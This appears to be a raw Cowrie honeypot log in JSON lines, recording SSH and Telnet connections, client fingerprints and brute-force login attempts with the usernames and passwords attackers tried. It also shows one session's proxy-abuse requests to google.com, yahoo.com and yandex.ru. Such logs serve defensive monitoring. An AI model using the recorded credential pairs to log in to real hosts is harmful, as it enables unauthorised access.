{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:32:57.963847Z","src_ip":"79.124.8.120","session":"8957e29d0800"}
{"eventid":"cowrie.session.closed","duration":180.0831298828125,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:32:57.966874Z","src_ip":"79.124.8.120","session":"8957e29d0800"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":37826,"dst_ip":"1.2.3.4","dst_port":22,"session":"26cb3ae35712","protocol":"ssh","message":"New connection: 45.88.8.215:37826 (1.2.3.4:22) [session: 26cb3ae35712]","sensor":"my-vps","timestamp":"2025-08-24T19:33:55.405417Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T19:33:55.860269Z","src_ip":"45.88.8.215","session":"26cb3ae35712"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T19:33:55.861229Z","src_ip":"45.88.8.215","session":"26cb3ae35712"}
{"eventid":"cowrie.login.success","username":"root","password":"Arpan@123","message":"login attempt [root/Arpan@123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T19:33:57.637283Z","src_ip":"45.88.8.215","session":"26cb3ae35712"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:33:58.652631Z","src_ip":"45.88.8.215","session":"26cb3ae35712"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64906,"dst_ip":"1.2.3.4","dst_port":22,"session":"722aa617663f","protocol":"ssh","message":"New connection: 217.72.205.35:64906 (1.2.3.4:22) [session: 722aa617663f]","sensor":"my-vps","timestamp":"2025-08-24T19:34:24.289950Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:34:24.292060Z","src_ip":"217.72.205.35","session":"722aa617663f"}
{"eventid":"cowrie.session.connect","src_ip":"115.242.236.6","src_port":24858,"dst_ip":"1.2.3.4","dst_port":23,"session":"c2a0693d1245","protocol":"telnet","message":"New connection: 115.242.236.6:24858 (1.2.3.4:23) [session: c2a0693d1245]","sensor":"my-vps","timestamp":"2025-08-24T19:37:07.435592Z"}
{"eventid":"cowrie.session.closed","duration":12.863502740859985,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:37:20.299025Z","src_ip":"115.242.236.6","session":"c2a0693d1245"}
{"eventid":"cowrie.session.connect","src_ip":"211.229.92.76","src_port":46256,"dst_ip":"1.2.3.4","dst_port":23,"session":"cbe814e87501","protocol":"telnet","message":"New connection: 211.229.92.76:46256 (1.2.3.4:23) [session: cbe814e87501]","sensor":"my-vps","timestamp":"2025-08-24T19:37:26.942587Z"}
{"eventid":"cowrie.session.closed","duration":30.44311237335205,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:37:57.385632Z","src_ip":"211.229.92.76","session":"cbe814e87501"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.71","src_port":34984,"dst_ip":"1.2.3.4","dst_port":22,"session":"04c278bceab7","protocol":"ssh","message":"New connection: 92.118.39.71:34984 (1.2.3.4:22) [session: 04c278bceab7]","sensor":"my-vps","timestamp":"2025-08-24T19:39:06.431196Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T19:39:06.432359Z","src_ip":"92.118.39.71","session":"04c278bceab7"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-24T19:39:06.464014Z","src_ip":"92.118.39.71","session":"04c278bceab7"}
{"eventid":"cowrie.login.failed","username":"sol","password":"12345","message":"login attempt [sol/12345] failed","sensor":"my-vps","timestamp":"2025-08-24T19:39:06.556016Z","src_ip":"92.118.39.71","session":"04c278bceab7"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:39:07.587738Z","src_ip":"92.118.39.71","session":"04c278bceab7"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55428,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee3b55b7be81","protocol":"ssh","message":"New connection: 217.72.205.35:55428 (1.2.3.4:22) [session: ee3b55b7be81]","sensor":"my-vps","timestamp":"2025-08-24T19:41:12.492335Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:41:12.493366Z","src_ip":"217.72.205.35","session":"ee3b55b7be81"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":40676,"dst_ip":"1.2.3.4","dst_port":22,"session":"827a864a43a6","protocol":"ssh","message":"New connection: 45.88.8.186:40676 (1.2.3.4:22) [session: 827a864a43a6]","sensor":"my-vps","timestamp":"2025-08-24T19:41:38.659208Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T19:41:39.241467Z","src_ip":"45.88.8.186","session":"827a864a43a6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T19:41:39.242197Z","src_ip":"45.88.8.186","session":"827a864a43a6"}
{"eventid":"cowrie.login.success","username":"root","password":"trustedStore1","message":"login attempt [root/trustedStore1] succeeded","sensor":"my-vps","timestamp":"2025-08-24T19:41:41.095728Z","src_ip":"45.88.8.186","session":"827a864a43a6"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:41:41.728220Z","src_ip":"45.88.8.186","session":"827a864a43a6"}
{"eventid":"cowrie.session.connect","src_ip":"58.150.121.58","src_port":53302,"dst_ip":"1.2.3.4","dst_port":23,"session":"7c22f5ca6765","protocol":"telnet","message":"New connection: 58.150.121.58:53302 (1.2.3.4:23) [session: 7c22f5ca6765]","sensor":"my-vps","timestamp":"2025-08-24T19:44:58.839915Z"}
{"eventid":"cowrie.session.closed","duration":31.551445245742798,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:45:30.391292Z","src_ip":"58.150.121.58","session":"7c22f5ca6765"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.71","src_port":40736,"dst_ip":"1.2.3.4","dst_port":22,"session":"09404c6fbc4a","protocol":"ssh","message":"New connection: 92.118.39.71:40736 (1.2.3.4:22) [session: 09404c6fbc4a]","sensor":"my-vps","timestamp":"2025-08-24T19:45:38.791489Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T19:45:38.793057Z","src_ip":"92.118.39.71","session":"09404c6fbc4a"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-24T19:45:38.823015Z","src_ip":"92.118.39.71","session":"09404c6fbc4a"}
{"eventid":"cowrie.login.failed","username":"sol","password":"1234","message":"login attempt [sol/1234] failed","sensor":"my-vps","timestamp":"2025-08-24T19:45:38.919916Z","src_ip":"92.118.39.71","session":"09404c6fbc4a"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:45:39.952258Z","src_ip":"92.118.39.71","session":"09404c6fbc4a"}
{"eventid":"cowrie.session.connect","src_ip":"185.246.128.133","src_port":43386,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7e9c9b075a9","protocol":"ssh","message":"New connection: 185.246.128.133:43386 (1.2.3.4:22) [session: f7e9c9b075a9]","sensor":"my-vps","timestamp":"2025-08-24T19:46:05.268985Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-WinSCP_release_5.1.3","message":"Remote SSH version: SSH-2.0-WinSCP_release_5.1.3","sensor":"my-vps","timestamp":"2025-08-24T19:46:05.270225Z","src_ip":"185.246.128.133","session":"f7e9c9b075a9"}
{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-08-24T19:46:05.314156Z","src_ip":"185.246.128.133","session":"f7e9c9b075a9"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-24T19:46:06.193021Z","src_ip":"185.246.128.133","session":"f7e9c9b075a9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"185.246.128.133","src_port":9861,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:9861","sensor":"my-vps","timestamp":"2025-08-24T19:46:06.239086Z","session":"f7e9c9b075a9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-24T19:46:06.284031Z","src_ip":"185.246.128.133","session":"f7e9c9b075a9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"185.246.128.133","src_port":1167,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:1167","sensor":"my-vps","timestamp":"2025-08-24T19:46:06.415091Z","session":"f7e9c9b075a9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-24T19:46:06.459896Z","src_ip":"185.246.128.133","session":"f7e9c9b075a9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"185.246.128.133","src_port":7005,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:7005","sensor":"my-vps","timestamp":"2025-08-24T19:46:06.591022Z","session":"f7e9c9b075a9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-24T19:46:06.635769Z","src_ip":"185.246.128.133","session":"f7e9c9b075a9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"185.246.128.133","src_port":3368,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:3368","sensor":"my-vps","timestamp":"2025-08-24T19:46:06.767130Z","session":"f7e9c9b075a9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":3,"message":"discarded direct-tcp forward request 3 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-24T19:46:06.811887Z","src_ip":"185.246.128.133","session":"f7e9c9b075a9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"77.88.55.88","dst_port":80,"src_ip":"185.246.128.133","src_port":12998,"message":"direct-tcp connection request to 77.88.55.88:80 from 127.0.0.1:12998","sensor":"my-vps","timestamp":"2025-08-24T19:46:06.943053Z","session":"f7e9c9b075a9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"77.88.55.88","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":4,"message":"discarded direct-tcp forward request 4 to 77.88.55.88:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-24T19:46:06.992254Z","src_ip":"185.246.128.133","session":"f7e9c9b075a9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"185.246.128.133","src_port":5940,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:5940","sensor":"my-vps","timestamp":"2025-08-24T19:46:07.123073Z","session":"f7e9c9b075a9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":5,"message":"discarded direct-tcp forward request 5 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-24T19:46:07.167791Z","src_ip":"185.246.128.133","session":"f7e9c9b075a9"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:46:07.213340Z","src_ip":"185.246.128.133","session":"f7e9c9b075a9"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60804,"dst_ip":"1.2.3.4","dst_port":22,"session":"362af78f8bf4","protocol":"ssh","message":"New connection: 217.72.205.35:60804 (1.2.3.4:22) [session: 362af78f8bf4]","sensor":"my-vps","timestamp":"2025-08-24T19:48:06.533920Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:48:06.535523Z","src_ip":"217.72.205.35","session":"362af78f8bf4"}
{"eventid":"cowrie.session.connect","src_ip":"121.176.116.80","src_port":60121,"dst_ip":"1.2.3.4","dst_port":23,"session":"92eaf4b642de","protocol":"telnet","message":"New connection: 121.176.116.80:60121 (1.2.3.4:23) [session: 92eaf4b642de]","sensor":"my-vps","timestamp":"2025-08-24T19:51:58.525159Z"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.71","src_port":46488,"dst_ip":"1.2.3.4","dst_port":22,"session":"a146c57e363b","protocol":"ssh","message":"New connection: 92.118.39.71:46488 (1.2.3.4:22) [session: a146c57e363b]","sensor":"my-vps","timestamp":"2025-08-24T19:52:11.955585Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T19:52:11.956619Z","src_ip":"92.118.39.71","session":"a146c57e363b"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-24T19:52:11.987245Z","src_ip":"92.118.39.71","session":"a146c57e363b"}
{"eventid":"cowrie.login.failed","username":"sol","password":"12","message":"login attempt [sol/12] failed","sensor":"my-vps","timestamp":"2025-08-24T19:52:12.080784Z","src_ip":"92.118.39.71","session":"a146c57e363b"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:52:13.114294Z","src_ip":"92.118.39.71","session":"a146c57e363b"}
{"eventid":"cowrie.session.closed","duration":30.419723510742188,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:52:28.944809Z","src_ip":"121.176.116.80","session":"92eaf4b642de"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64480,"dst_ip":"1.2.3.4","dst_port":22,"session":"747ff038e9e7","protocol":"ssh","message":"New connection: 217.72.205.35:64480 (1.2.3.4:22) [session: 747ff038e9e7]","sensor":"my-vps","timestamp":"2025-08-24T19:54:43.313489Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:54:43.314634Z","src_ip":"217.72.205.35","session":"747ff038e9e7"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.71","src_port":52240,"dst_ip":"1.2.3.4","dst_port":22,"session":"635498739a01","protocol":"ssh","message":"New connection: 92.118.39.71:52240 (1.2.3.4:22) [session: 635498739a01]","sensor":"my-vps","timestamp":"2025-08-24T19:58:45.501825Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T19:58:45.502654Z","src_ip":"92.118.39.71","session":"635498739a01"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-24T19:58:45.532727Z","src_ip":"92.118.39.71","session":"635498739a01"}
{"eventid":"cowrie.login.failed","username":"sol","password":"1","message":"login attempt [sol/1] failed","sensor":"my-vps","timestamp":"2025-08-24T19:58:45.626339Z","src_ip":"92.118.39.71","session":"635498739a01"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:58:46.659015Z","src_ip":"92.118.39.71","session":"635498739a01"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":57256,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9d1acdb3a68","protocol":"ssh","message":"New connection: 45.88.8.215:57256 (1.2.3.4:22) [session: b9d1acdb3a68]","sensor":"my-vps","timestamp":"2025-08-24T20:00:04.149097Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T20:00:04.474428Z","src_ip":"45.88.8.215","session":"b9d1acdb3a68"}
